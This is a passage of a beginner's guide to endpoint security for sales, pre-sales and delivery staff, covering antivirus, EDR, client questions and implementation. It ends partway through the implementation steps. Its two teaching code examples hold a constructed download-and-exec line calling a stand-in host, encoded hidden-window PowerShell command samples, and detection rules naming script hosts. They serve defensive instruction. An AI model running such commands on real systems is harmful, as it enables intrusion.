What Is Endpoint Security


Endpoint Security

For
Sales, Pre-sales, & Delivery
BEGINNERS

Sudhansu M Nayak & OpenAI


Table of Contents
PREFACE .......................................................................................................................................................... 4
1. ANTI-VIRUS, ENDPOINT DETECTION AND RESPONSE- SIMPLE INTRODUCTIONS ...................................... 5
2. SIGNATURE-BASED VS SIGNATURE-LESS AV AND EDR: ............................................................................ 6
3. ENDPOINT SECURITY- ANTIVIRUS (AV) + ENDPOINT DETECTION & RESPONSE (EDR) ............................... 8
3.1 WHAT IS AN ANTI-VIRUS SOLUTION? ................................................................................................................ 8
3.1.1 What are viruses, trojans, worms, spyware? .................................................................................................. 8
3.1.2 What is a malware signature? ......................................................................................................................... 9
3.1.3 Anti-virus types ............................................................................................................................................... 9
3.1.4 Components of an EDR solution ................................................................................................................... 10
3.2 SALES CUE- QUESTIONS TO ASK AND ANSWERS TO GIVE ...................................................................................... 11
3.2.1 Questions to ask prospective client .............................................................................................................. 11
3.2.2 Questions prospective clients will ask of sales ............................................................................................ 12
3.2.3 Payment terms to agree with the clients...................................................................................................... 13
3.3 PRE-SALES CUE: SOLUTION BUILDING COMPLEXITIES .......................................................................................... 14
3.3.1 Sizing the anti-virus solution ........................................................................................................................ 14
3.3.2 What will the antivirus solution connect to? ........................................................................... 14
3.3.3 Implementation steps of Anti-virus solution................................................................................................ 15
3.3.4 What can go wrong in antivirus solution ....................................................................................................... 17
3.3.5 What Service Levels can be committed/ expected? ..................................................................................... 18
3.3.6 Why can't any vendor commit resolution time/ SLA accurately? ................................................................. 18
3.4 DELIVERY CUE- ANTI-VIRUS AND EDR OPERATIONS ........................................................................................... 19
3.4.1 Daily Anti-virus operations activities ............................................................................................................ 19
3.4.2 Weekly Anti-virus operations activities ........................................................................................................ 20
3.4.3 Monthly Anti-virus operations activities....................................................................................................... 20
3.4.4 What does an L1 Antivirus Engineer do? ....................................................................................................... 21
3.4.5 What does an L2 Antivirus Engineer do? ....................................................................................................... 22
3.4.6 What does an L3 Antivirus Engineer do? ....................................................................................................... 22
3.4.7 What does an EDR Service Engineer do ........................................................................................................ 24
3.4.8 What does an EDR Service Manager do ......................................................................................................... 28
3.4.9 Reports- Anti- Virus Operations.................................................................................................................... 32
3.4.10 Reports- EDR Operations .............................................................................................................................. 32
3.4.11 Governance of Antivirus solution .................................................................................................................. 33
3.4.12 Governance of EDR solution.......................................................................................................................... 34
4. ENDPOINT SECURITY- MOBILE SECURITY ............................................................................................... 37
4.1 WHAT IS A MOBILE THREAT DEFENCE SOLUTION? .............................................................................................. 37
4.1.1 EMM, MDM, MTD: What are these? ................................................................................................................ 37
4.1.2 EMM, MDM, MTD types .................................................................................................................................. 38
4.2 SALES CUE- QUESTIONS TO ASK AND ANSWERS TO GIVE ...................................................................................... 39
4.2.1 Questions to ask prospective client .............................................................................................................. 39

Page 2 of 52 Open to all


4.2.2 Questions prospective client will ask of sales .............................................................................................. 40
4.2.3 Payment terms to agree with the clients...................................................................................................... 40
4.3 PRE-SALES CUE: SOLUTION BUILDING COMPLEXITIES .......................................................................................... 41
4.3.1 Sizing the solution......................................................................................................................................... 41
4.3.2 What will the EMM, MDM, MTD solution connect to? .............................................................. 42
4.3.3 Implementation steps of EMM, MDM, MTD solution ..................................................................................... 42
4.3.4 What can go wrong in EMM, MDM, MTD solution .......................................................................................... 43
4.3.5 What Service Levels can be committed/ expected? ..................................................................................... 44
4.3.6 Why can't any vendor commit resolution time/ SLA accurately? ................................................................. 45
4.4 DELIVERY CUE- EMM MDM MTD OPERATIONS .............................................................................................. 45
4.4.1 Daily Activities ............................................................................................................................................... 45
4.4.2 Weekly Activities ........................................................................................................................................... 46
4.4.3 Monthly Activities.......................................................................................................................................... 46
4.4.4 What does an L1 EMM, MDM, or MTD Engineer do? ...................................................................................... 47
4.4.5 What does an L2 EMM, MDM, or MTD Engineer do? ...................................................................................... 48
4.4.6 What does an L3 EMM, MDM, or MTD Engineer do? ...................................................................................... 49
4.4.7 Reports .......................................................................................................................................................... 49
4.4.8 Governance of EMM, MDM, or MTD solution ................................................................................................. 50
ABOUT THE AUTHORS.................................................................................................................................... 52

Preface

This book is intended to simplify cyber security as much as possible and to give beginners, semi-technical
and non-technical practitioners leading questions to field. To explain certain concepts, ideas have
been stretched to everyday real-life scenarios. Please do send in your thoughts and questions so that we
can make this more engaging.
The attempt to flatten the learning curve and build consensus among buyers, technology owners, and
service providers guided us to structure the book into technology chapters. Each chapter explains the
basics (what the technology is and how it helps), followed by a sales cue, a pre-sales cue, and a delivery cue.
The sales cue deals with the questions sales leaders can ask prospective clients to develop needs and use
cases, the questions a prospective client may in turn ask of the sales leader while exploring those use
cases, and the parameters the two sides can agree on while finalising the terms and conditions of
the sales transaction.
The pre-sales cue deals with possible sizing guidelines or benchmarks for the technology, the other
systems the solution can connect with, the steps of implementing the solution, the service-level
parameters the parties can agree to, and where things can go wrong.
The delivery cue deals with daily, weekly and monthly operations activities, which level of capability (L1, L2,
L3) can manage which activities, a typical set of reports for the solution, and the factors to look
at for holistic governance of the solution.
This compilation is by no means exhaustive, but it aims to give beginners in cyber-security sales,
pre-sales and delivery enough thrust to move to the next level of expertise. With your continued
support, we can make this book easier to comprehend while keeping it simple and still addressing the
questions frequently asked in the market.
OpenAI has been used to generate answers to frequently asked questions and, where necessary, those
answers have been augmented with practical suggestions. Since OpenAI has been used, we have decided
to make this book open and free to use.
While reading the book, if you see a text portion in saffron italics (for example: malware signatures),
the term is explained in the next sub-section. If there are terms you want more explanation of,
please give us the feedback and we shall try to add them to the sections. Italics also mark new
terms and some sample programs.
We hope you enjoy reading or referring to it more than we enjoyed compiling it.

1. Anti-Virus, Endpoint Detection and Response- simple introductions
“What will happen when someone alters, breaks or takes away my toys?”
—You, all the time
Just like how you wash your hands to avoid getting sick, antivirus helps keep your computer
healthy by finding and removing the bad stuff that can make it sick, like germs for your
computer.
Anti-Virus (AV) software is like a digital shield for your computer. It's a program that scans
your computer for potentially harmful files, just like how your body's immune system checks
for viruses. When you download or open files, the antivirus looks at them closely to see if they
match any known patterns of harmful software. If it finds something suspicious, it can
quarantine or remove it to protect your computer from getting sick.
Endpoint Detection and Response, called EDR for short, is like a digital detective for your
computer. While antivirus focuses on known threats, EDR goes a step further. Imagine if your
toys started moving on their own when you weren't looking – EDR would notice and tell you
something weird is happening on your computer. It helps keep your computer safe by
watching out for any sneaky things that shouldn't be there.
It constantly watches everything happening on your computer and checks for unusual or
suspicious activities. It's like having a security camera in your house that records everything
and alerts you if it sees anything strange. EDR helps detect new and previously unknown
threats by analyzing patterns and behavior, not just relying on known signatures.
Antivirus software and Endpoint Detection and Response both want to catch bad guys. One way
they do so is by looking at their faces, their pictures, their special fingerprints, which are
unique to each bad guy. These fingerprints help the computer recognise whether a file or program
is a bad guy or not. So a 'malicious software signature' is like a list of these special
fingerprints that the computer uses to catch and stop bad programs from doing harm. It's like
having a secret code to identify the bad guys and keep your computer safe.

2. Signature-based Vs Signature-less AV and EDR:

Signature-based EDR is like a computer detective who knows what different criminals look
like because they have pictures of their faces, their special fingerprints, which are unique to
each bad guy. These pictures are called "signatures." So, if a criminal matches one of these
pictures, the detective can say, "Hey, I know you're a bad guy!" It's like having a book of known
bad guys' photos: if a new bad guy looks exactly like one in the book, we catch them. The catch
is the word exactly. A bad guy who puts on a false moustache, or who has never been photographed
at all, is not in the book and walks straight past this detective.

Signatureless EDR is like a super-smart detective who doesn't need pictures and can spot
troublemakers even if they've never been seen before. Instead, this detective watches how
people act and works out whether they're doing something suspicious. Imagine you're playing a
game and you notice someone cheating even though you've never met them before. This detective
can tell when someone is acting strangely or doing something sneaky, even if it's a brand-new
bad guy nobody has seen before, because it relies on patterns and behaviour, not just pictures.
The price of instinct is that it is sometimes wrong: an honest person doing something unusual
can be mistaken for a bad guy, which is why such products let the operator choose between
alerting only and blocking automatically.

Signature-based EDR relies on pictures, fingerprints or "signatures" to catch bad guys, while
Signatureless EDR relies on its wits and instincts to catch them. Most real products do both.

This brilliant creation is from Adam Martinakis. https://www.martinakis.com/

3. Endpoint Security- Antivirus (AV) + Endpoint Detection & Response (EDR)
Endpoint security is a branch of cybersecurity that focuses on protecting individual devices
that connect to a network, such as
- computers,
- smartphones,
- tablets, and
- internet of things (IoT) devices.

The endpoint is often the last line of defence against cyber threats: phishing mail, malicious
downloads and infected USB drives all land on a device first. The goal of endpoint security is to
prevent these devices from being compromised and then used to reach sensitive information or to
launch attacks on the rest of the network.
Endpoint security typically involves a combination of hardware and software controls, including
antivirus software, host-based firewalls, and encryption technologies such as full-disk encryption.
The objective of endpoint security is to protect the network by securing each endpoint and
preventing the spread of malware and other cyber threats.
3.1 What is an Anti-virus solution?

An anti-virus (AV) solution is a type of software that is designed to prevent, detect, and
remove malicious software, also known as malware, from a computer or network. Malware
can include viruses, trojans, worms, spyware, and other types of malicious software that can
cause harm to a computer or steal sensitive information.
An anti-virus solution typically works by scanning a computer's files, both on a schedule and as
they are opened, written or downloaded, together with incoming email attachments and, in some
products, network traffic, for known malware signatures.
If malware is detected, the anti-virus software will either remove it or quarantine it (move it to
an isolated store where it cannot run) to prevent it from spreading to other parts of the computer
or network. Some anti-virus solutions also include additional security features, such as host
firewalls, intrusion detection and prevention, and real-time threat intelligence updates.
In short, an anti-virus solution is an essential tool in maintaining the security of a computer or
network and protecting against the spread of malware.
3.1.1 What are viruses, trojans, worms, spyware?

A virus is a type of malware that infects a computer by attaching itself to other legitimate
software. Once installed, a virus can spread to other parts of the computer and cause damage,
such as corrupting files or slowing down the system.
A trojan is a type of malware that disguises itself as legitimate software and is used to gain
unauthorized access to a computer. Trojans are often used by hackers to steal sensitive
information, such as passwords and credit card numbers.
A worm is a type of malware that is designed to spread itself from one computer to another,
often over a network. Unlike a virus, a worm does not need to attach itself to other software
and can spread on its own.

Spyware is a type of malware that is used to collect information about a computer and its
user, without their knowledge. Spyware can be used to track a user's internet activity, steal
passwords, and gather other sensitive information.
3.1.2 What is a malware signature?

Malware signatures are unique patterns or characteristics used to identify a specific piece or
family of malware. A signature can be an exact fingerprint of a whole file (for example a SHA-256
hash), a sequence of bytes or a pattern found inside the file, a combination of strings, imports and
structure, or, occasionally, a file name (the weakest kind, since a name is trivial to change).
Anti-virus (AV) software uses malware signatures to detect and remove malware from a
computer or network. When the AV software scans a computer or network, it compares files and
incoming data with its database of known malware signatures. If a match is found, the AV
software can identify the type of malware and take the appropriate action, such as removing
or quarantining it.
The strength of a signature is also its limit. A hash signature is precise and cheap to check, but
it matches only the exact bytes it was made from: change one byte, repack the file, and the hash
no longer matches. Pattern signatures are written to survive such small changes and can catch a
whole family, at the cost of a higher risk of matching something legitimate (a false positive). A
signature can only exist for malware someone has already seen and analysed, which is why
signature-only protection lags behind new threats.
Malware signatures are constantly updated by anti-virus vendors, often several times a day, to
keep up with new and evolving malware threats. An endpoint that has not received updates is
blind to everything published since its last update, so update health is an operational metric,
not a detail.
In short, malware signatures are a key component of anti-virus software, allowing it to
accurately identify and remove known malware from a computer or network.
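The two kinds of signature described above, as an added example that is not code from this book or from any vendor's product. It builds a tiny signature database over constructed byte strings (the "files", the signature names and the URL are invented for illustration, not real malware) and scans three inputs: the known sample, a one-byte variant of it, and a benign file. The hash signature catches only the exact known file, the pattern signature also catches the variant, and neither fires on the benign file.

```python
"""Hash and pattern malware signatures, matched the way a simple AV scanner does.

Added example; every sample, name and URL below is constructed for
illustration and is not real malware or a real vendor's database.
"""
import hashlib
import re
from typing import List

# --- Constructed samples (assumptions, not real files) -----------------------
# A "known" sample that a vendor has already seen and fingerprinted.
KNOWN_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"stage2 = download('http://c2.example.invalid/p.bin'); exec(stage2)"
)
# The same sample with a few bytes changed (a trivial repack): the hash
# changes, but the byte pattern describing what it does survives.
VARIANT_SAMPLE = KNOWN_SAMPLE.replace(b"p.bin", b"q.bin")
# A benign file that happens to contain the word "download".
BENIGN_SAMPLE = b"README: to download the installer, visit the vendor site."

# --- Signature database (constructed) ----------------------------------------
# 1. Hash signatures: exact fingerprints of whole files. Cheap and precise,
#    but brittle: any change to the file breaks the match.
HASH_SIGNATURES = {
    hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Trojan.Downloader.Constructed",
}
# 2. Pattern signatures: byte/regex patterns written to survive small edits.
#    This one keys on a download(...) call whose result is immediately exec'd,
#    not on the specific URL, so renamed payloads still match.
PATTERN_SIGNATURES = [
    (re.compile(rb"download\('http://[^']+'\);\s*exec\("),
     "Trojan.Downloader.Constructed.gen"),
]


def sha256(data: bytes) -> str:
    """Hex SHA-256 of the whole file, the usual key for a hash signature."""
    return hashlib.sha256(data).hexdigest()


def scan(data: bytes) -> List[str]:
    """Return the names of every signature that matches `data`:
    exact hash matches first, then generic pattern matches."""
    hits = []
    name = HASH_SIGNATURES.get(sha256(data))
    if name:
        hits.append(name)
    for pattern, name in PATTERN_SIGNATURES:
        if pattern.search(data):
            hits.append(name)
    return hits


def verdict(data: bytes) -> str:
    """The action an AV engine would take: quarantine on any match."""
    return "quarantine" if scan(data) else "clean"


if __name__ == "__main__":
    for label, sample in [("known", KNOWN_SAMPLE),
                          ("variant", VARIANT_SAMPLE),
                          ("benign", BENIGN_SAMPLE)]:
        print(f"{label:8s} {verdict(sample):10s} {scan(sample)}")
```

Run it and compare the three verdicts: the variant shows why vendors write generic pattern signatures rather than only hash lists, and the benign file shows the false-positive risk a careless pattern would carry. A real engine does the same job against a far larger database, and against unpacked and decoded content rather than the raw bytes on disk.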
3.1.3 Anti-virus types

There are several types of anti-virus (AV) solutions. The labels below are the ones used in the
market; they overlap, and a modern product usually combines several of them:

1. Traditional Anti-Virus: The most basic type, which uses a database of malware signatures to
detect and remove malware from a computer or network, typically through scheduled or
on-demand scans.
2. Real-Time Anti-Virus: Provides continuous protection by scanning files as they are
downloaded, opened, written or executed (on-access scanning), in addition to regularly
scheduled scans of the computer or network.
3. Behaviour-Based Anti-Virus: Looks for unusual behaviour rather than known content, such
as a document reader launching a command shell, a program injecting code into another
process, or a process encrypting many files in quick succession, and blocks or reports the
offending process. This catches malware that has no signature yet, at the cost of occasional
false positives.
4. Cloud-Based Anti-Virus: Keeps a small local engine and sends file hashes, metadata or
suspicious samples to the vendor's cloud service for reputation lookups and analysis. This
shortens the gap between a new threat being identified and every endpoint knowing about
it, and shrinks the local signature database, but protection degrades when the endpoint is
offline unless the product keeps a local fallback.
5. Endpoint Anti-Virus: Designed specifically to protect individual devices that connect to a
network, such as laptops, servers, smartphones and IoT devices, and managed from a
central console rather than configured on each device separately.
In short, there are several different types of anti-virus solutions available, each with its own
strengths and weaknesses. The type of anti-virus solution that is best for a particular
organization will depend on its specific needs and requirements.

3.1.4 Components of an EDR solution

An EDR (Endpoint Detection and Response) solution is a comprehensive cybersecurity tool designed
to protect and monitor endpoints (such as computers, servers, and mobile devices) within a network.
It typically consists of several components that work together to detect, respond to, and mitigate
security threats. Here are the key components of an EDR solution:
1. Agent Software: EDR solutions usually require the installation of agent software on
each endpoint you want to protect. This agent collects data, monitors activities, and
communicates with the central EDR server or cloud-based platform.
2. Central Management Console: The central management console is the user interface
that security administrators use to configure, monitor, and manage the EDR solution.
It provides a centralized view of endpoint security status, alerts, and actions.
3. Data Collection and Analysis Engine: EDR solutions collect a vast amount of endpoint
data, including logs, system events, network traffic, and more. A data collection and
analysis engine processes this data in real-time to identify security threats and
suspicious behaviour.
4. Threat Detection and Analysis: EDR solutions use various methods for threat
detection, such as signature-based detection (identifying known threats), behaviour-
based analysis (detecting unusual or malicious behaviour), and machine learning
algorithms (predicting and identifying emerging threats).
5. Alerting and Reporting: When a potential security threat is detected, the EDR solution
generates alerts and reports. These alerts are sent to security administrators or a
security operations centre (SOC) for further investigation and action.
6. Incident Response and Remediation: EDR solutions often include incident response
capabilities. They allow security teams to take immediate action to contain and
mitigate threats. Actions may include isolating compromised endpoints, blocking
malicious processes, or removing malicious files.
7. Forensic Analysis Tools: EDR solutions provide tools for forensic analysis, which helps
security professionals investigate security incidents, understand the scope of an
attack, and identify the root cause.
8. Integration with SIEM: EDR solutions can integrate with Security Information and
Event Management (SIEM) systems to provide a broader view of security events across
the organization. This integration enhances threat detection and response capabilities.
9. Machine Learning and AI: Many modern EDR solutions leverage machine learning and
artificial intelligence to continuously improve threat detection and reduce false
positives. These technologies can analyse vast amounts of data to identify complex
threats.
10. Cloud-Based or On-Premises: EDR solutions can be cloud-based, where data is sent to
and managed in the cloud, or on-premises, where data remains within an
organization's own network. Cloud-based solutions offer scalability and ease of
management, while on-premises solutions provide more control over data.

11. Compliance and Reporting: EDR solutions often include features to help organizations
meet regulatory compliance requirements. They can generate compliance reports and
assist in audit processes.
12. User and Entity Behaviour Analytics (UEBA): Some EDR solutions incorporate UEBA
capabilities, which analyse user and entity behaviour to detect insider threats or
compromised accounts based on deviations from normal behaviour patterns.
13. Customizable Policies: EDR solutions allow organizations to define security policies
and rules tailored to their specific needs. These policies determine how the solution
responds to security events.
14. Updates and Threat Intelligence: EDR solutions rely on up-to-date threat intelligence
feeds and databases to identify known threats. Regular updates are essential to stay
current with emerging threats.
15. Integration with Other Security Tools: EDR solutions can integrate with other security
tools, such as firewalls, antivirus software, and intrusion detection systems, to provide
a comprehensive security posture.
These components work together to provide a robust defence against a wide range of cybersecurity
threats and enable organizations to proactively detect, respond to, and mitigate security incidents on
their endpoints.
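The data collection, threat detection, alerting and response components above, as an added example rather than code from this book or from any EDR product. The process-creation telemetry, host names, user names, rules and the isolation threshold are constructed assumptions for illustration. Two behaviour rules run over the events (an Office application spawning a script host, and PowerShell started with an encoded command), every match becomes an alert, and the response step decides per host whether to isolate it or to open an investigation. No hash or signature of the malicious document is involved, which is the point of behaviour-based detection.

```python
"""Behaviour-based endpoint detection and response, in miniature.

Added example, not code from the book or from any EDR product. The
telemetry, host names, rules and thresholds are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    ts: int          # event time in seconds (constructed)
    host: str
    user: str
    parent: str      # image name of the parent process
    image: str       # image name of the newly created process
    cmdline: str


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str    # "high" or "medium"
    host: str
    event: ProcessEvent


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def rule_office_spawns_script_host(ev: ProcessEvent) -> Optional[Alert]:
    """A document viewer launching a shell or script host is the classic
    macro/phishing pattern; no file hash is needed to spot it."""
    if ev.parent.lower() in OFFICE_APPS and ev.image.lower() in SCRIPT_HOSTS:
        return Alert("office_spawns_script_host", "high", ev.host, ev)
    return None


def rule_encoded_powershell(ev: ProcessEvent) -> Optional[Alert]:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, ...), so match on the prefix, not the full flag."""
    if ev.image.lower() not in POWERSHELL:
        return None
    for tok in ev.cmdline.split():
        t = tok.lower()
        if t.startswith("-") and len(t) >= 2 and "-encodedcommand".startswith(t):
            return Alert("encoded_powershell", "medium", ev.host, ev)
    return None


RULES = [rule_office_spawns_script_host, rule_encoded_powershell]


def detect(events: List[ProcessEvent]) -> List[Alert]:
    """Run every rule over every event; return alerts in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            alert = rule(ev)
            if alert is not None:
                alerts.append(alert)
    return alerts


def respond(alerts: List[Alert]) -> Dict[str, str]:
    """Per-host action: isolate on any high-severity alert or on two or more
    alerts of any severity, otherwise open an investigation. The thresholds
    are an assumption for this example, not a product default."""
    per_host: Dict[str, List[Alert]] = {}
    for a in alerts:
        per_host.setdefault(a.host, []).append(a)
    actions = {}
    for host, host_alerts in per_host.items():
        if any(a.severity == "high" for a in host_alerts) or len(host_alerts) >= 2:
            actions[host] = "isolate"
        else:
            actions[host] = "investigate"
    return actions


# Constructed telemetry: a phishing-style chain on LAPTOP-01, an administrator
# script on LAPTOP-01 that must not alert, and one encoded command on SRV-02
# that on its own only warrants investigation.
SAMPLE_EVENTS = [
    ProcessEvent(1000, "LAPTOP-01", "alice", "explorer.exe", "winword.exe",
                 "winword.exe invoice.docm"),
    ProcessEvent(1003, "LAPTOP-01", "alice", "winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent(1900, "LAPTOP-01", "admin", "explorer.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ProcessEvent(2500, "SRV-02", "svc_build", "cmd.exe", "powershell.exe",
                 "powershell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAA="),
]


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.severity:6s}] {a.host} {a.rule}: {a.event.parent} -> {a.event.image}")
    print(respond(found))
```

The administrator's backup script passes through untouched even though it is PowerShell with execution policy bypassed, because neither rule keys on "PowerShell ran" but on how it was started. In a real product the event stream would also carry file, registry and network events, the rules would number in the hundreds, and "isolate" would be a network-containment command sent back to the agent rather than a string in a dictionary.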

3.2 Sales cue- Questions to ask and answers to give

3.2.1 Questions to ask prospective client

To gain a better understanding of the prospective client's current security situation and
identify potential areas where an anti-virus solution could provide additional protection, ask
the following questions. These can help you determine if the prospective client has a genuine
need for an anti-virus solution and how your solution can meet their specific requirements.
1. What types of devices does your organization use, and how are they connected to the
internet and each other?
2. What operating systems and platforms are these endpoints running (e.g., Windows,
macOS, Linux)?
3. Are any endpoints remote or mobile?
4. What types of data and information does your organization handle, and how is it
stored and protected?
5. Are there specific industry regulations or compliance standards (e.g., Indian IT Act, The
Digital Personal Data Protection Act, Reserve Bank of India, Insurance Regulatory and
Development Authority of India, Securities and Exchange Board of India, National
Payments Corporation of India, CERT-In, CEA (Cyber Security in Power Sector), HIPAA,
GDPR, or any other domestic or international regulation, directions, guidelines) that
your organization must adhere to?
6. How does EDR fit into your compliance strategy?

7. How often do your employees access sensitive information or use the internet while
on the job?
8. What security measures are currently in place to protect against cyber threats, such
as malware and hacking?
9. Have you experienced any security breaches or incidents in the past, and how were
they handled?
10. Do you have a budget allocated for EDR implementation and ongoing maintenance?
11. Do you have an in-house IT or cybersecurity team, or will you need external support?
12. Are there existing security tools or solutions you want the EDR system to integrate
with?
13. What level of integration with other security tools or SIEM systems do you require?
14. What are your organization's regulations and compliance requirements regarding data
security? What are your data privacy requirements, and how will the EDR solution
handle sensitive data?
15. How long do you need to retain EDR data for compliance or investigative purposes?

3.2.2 Questions prospective clients will ask of sales

Clients looking for an anti-virus solution may ask a variety of questions to determine if a
particular solution will meet their needs. Some common questions include:
1. What types of threats does the solution protect against?
2. How does the solution detect and prevent malware?
3. Can you provide an overview of your EDR solution? What makes your EDR solution
unique or different from others on the market?
4. Do you offer both cloud-based and on-premises deployment options? What are the
advantages and disadvantages of each deployment option?
5. What is the false positive rate of the solution? How does your EDR solution detect
security threats on endpoints? What response capabilities does it offer in case of a
detected threat?
6. Which operating systems and devices does your EDR solution support? Is it compatible
with our organization's existing endpoints?
7. How often are the virus definitions updated? Does the solution have a proven track
record of protecting against the types of threats faced by the client's industry or
organization?
8. Does the solution integrate with other security technologies, such as firewalls or
intrusion detection systems? Can your EDR solution integrate with our existing security
tools or SIEM system? What is the process for setting up these integrations?
9. How does the solution handle outbreak and rapidly evolving threats? How does your
EDR solution stay updated with the latest threat intelligence? Can you describe your
approach to threat detection and threat hunting?

10. What kind of support and maintenance is included with the solution?
11. Does the solution require any special hardware or software to run?
12. How does the solution impact performance and system resources?
13. Do you provide training and onboarding for our IT and security teams? What resources
are available for users to learn how to use the EDR solution effectively? What level of
technical support and maintenance is included with your EDR solution? What is the
service-level agreement (SLA) for support response times?
14. What types of reports and analytics does your EDR solution provide? Can these reports
be customized to our organization's specific needs?
15. What is the cost of the solution and what payment options are available? What is the
pricing structure for your EDR solution? Are there additional costs for features or
scalability?
These are just a few examples of the types of questions that clients may ask when evaluating
an anti-virus solution. The specific questions that are asked will depend on the client's needs,
concerns, and requirements.
3.2.3 Payment terms to agree with the clients

Almost all antivirus technology owners ask for advance payment, usually 100% in advance.
So, unless clients pay on similar terms, the service provider comes under heavy cash-flow pressure.
Therefore, agreeing on 100% advance payment, or on back-to-back payment (the client pays the
service provider/system integrator, and the system integrator pays the antivirus technology
owner via distributors), always keeps the cash registers green and healthy.
For further reference, the payment terms for antivirus solutions can vary depending on the
specific solution being offered. Some common payment options include:
1. Subscription-based: Many antivirus solutions are offered on a subscription basis,
where clients pay a monthly or annual fee to access the solution and receive ongoing
updates and support.
2. Per-device: Some antivirus solutions charge clients based on the number of devices
that the solution is installed on. This can be a useful option for organizations that need
to protect a large number of devices.
3. Per-user: Some antivirus solutions charge clients based on the number of users that
the solution is protecting, rather than the number of devices.
4. One-time fee: Some antivirus solutions are sold for a one-time fee, with no ongoing
subscription or maintenance cost. Check what happens to signature and engine updates at
the end of the licence term, since protection that no longer updates quickly becomes
protection in name only.
5. Volume pricing: Some antivirus vendors offer volume pricing for clients that purchase
large numbers of licenses, as an incentive to increase sales.
These are just a few examples of the types of payment options that are available for antivirus
solutions. The specific payment terms will depend on the solution being offered. It's always
recommended to carefully review the terms and conditions of an antivirus solution before
making a purchase.

3.3 Pre-sales cue: Solution building complexities

3.3.1 Sizing the anti-virus solution

Sizing for an anti-virus solution involves determining the necessary resources and capacities
required to effectively protect a computer or network from malware and other security
threats. To do this, you will need to consider the following factors:
1. Environment size: The size of the environment, including the number of endpoints
and servers, will impact the size and capacity requirements of the anti-virus solution.
2. Threat landscape: The threat landscape will impact the number of malware detections
and the frequency of malware updates required, which will impact the processing
power, storage, and network bandwidth required.
3. Performance requirements: The performance requirements of the environment,
including the response time and processing power required, will impact the size and
capacity of the anti-virus solution.
4. Resource constraints: The available resources, including processing power, storage,
and network bandwidth, will impact the size and capacity of the anti-virus solution.
5. Scalability: The scalability of the environment, including the ability to add or remove
endpoints or servers as needed, will impact the size and capacity of the anti-virus
solution.
6. Security requirements: The security requirements of the environment, including the
need for real-time threat protection, will impact the size and capacity of the anti-virus
solution.
7. Encryption: Check for existing encryption and whether the encryption keys are available
with the client or not.
8. Make in India clauses: Check for Make in India clauses in the compliance requirements.
Sometimes data residency and sovereignty compliance guidelines add complications.
Once you have ascertained these, choose the type of anti-virus solution and work on the
sizing with the technology and practice teams. In general, it is important to ensure the
solution is appropriately sized for the specific environment and security requirements. This
helps to minimize the risk of performance issues and ensures that the solution is effective
in protecting against malware and other security threats.
3.3.2 To what will an antivirus solution connect?

An antivirus solution can potentially connect to a variety of other organizational systems,
depending on the specific needs and requirements of the organization. Some common
systems that antivirus solutions can connect to include:
1. Endpoint devices: Antivirus solutions can be installed on individual endpoint devices,
such as laptops, desktop computers, and mobile devices, to protect against malware
and other threats on those devices.



2. Network infrastructure: Antivirus solutions can integrate with network infrastructure
components, such as routers, switches, and firewalls, to provide a comprehensive view
of network traffic and identify potential threats.
3. Servers: Antivirus solutions can be installed on servers, including file servers, web
servers, and database servers, to protect against malware and other threats that
target those systems.
4. Cloud systems: Antivirus solutions can be integrated with cloud systems, such as cloud
storage services, to protect against malware and other threats in the cloud
environment.
5. Management systems: Antivirus solutions can integrate with management systems,
such as security information and event management (SIEM) systems, to provide
centralized management and reporting of antivirus activity.
These are just a few examples of the types of systems that antivirus solutions can connect to.
The specific systems that an antivirus solution will connect to will depend on the needs and
requirements of the organization.
3.3.3 Implementation steps of Anti-virus solution

The implementation steps of an antivirus solution typically involve the following:


1. Assessment: Before implementing an antivirus solution, it's important to assess the
current security environment and identify the specific needs and requirements of the
organization. This step can involve a threat analysis, security gap assessment, and
review of current security infrastructure.
a. Some clients ask for desk-side licenses to be installed on mobile devices and
tablets. Note that iOS, macOS, Android, Windows, Unix and Linux
environments behave differently and may need different types of licenses.
b. Some systems may have old hardware, software or firmware and may not
support the latest version or the next 2-3 years of updates to the technology. Do
detailed due diligence on existing end-of-life or approaching-end-of-life devices
and query the status of warranty and annual maintenance contracts on all
endpoints.
c. Some organisations will have field personnel with devices without internet
connectivity (due to physical or compliance requirements, i.e. air-gapped
systems), and the organisation's information security management policy may
prohibit USB or Bluetooth access. These are tricky scenarios. Cross-check these
aspects with clients and agree on a workable solution.
2. Planning: Based on the results of the assessment, a plan for implementing the antivirus
solution should be developed. This may involve determining the scope of the project,
identifying the systems and devices that need protection, and determining the budget
and timeline for the project.
3. Selection: Based on the results of the assessment and planning steps, a specific
antivirus solution can be selected. This may involve evaluating different solutions,
requesting demos, and comparing the features and costs of each solution.



4. Installation: Once a solution has been selected, it can be installed on the systems and
devices that need protection. This may involve downloading software, configuring
settings, and integrating the solution with other security technologies. The installation
steps of an antivirus solution typically involve the following:
a. Prepare the environment: Before installing the antivirus solution, it's important
to prepare the environment by checking the system requirements, backing up
important data, and disabling any conflicting software or security technologies.
Check for encryption; you will need to decrypt systems to prevent conflicts.
During the data backup process, endpoint devices or storage devices sometimes
misbehave and may crash. Discuss in detail the possible data recovery options
for these lapses and who will bear the cost of the data recovery charges.
Sometimes external data recovery specialists are needed to recover data, and
this has the potential to exceed the project budget.
b. Download the software: The antivirus software can be downloaded from the
vendor's website or obtained through other means, such as a CD or USB drive.
Check whether the organisation allows the use of CDs, USB drives or large online
data drives.
c. Install the software: The installation process will vary depending on the
solution being used, but typically involves following the instructions provided
by the vendor. This may involve accepting a license agreement, choosing an
installation location, and configuring basic settings.
d. Configure the software: After the software has been installed, it will need to
be configured to meet the specific needs and requirements of the organization.
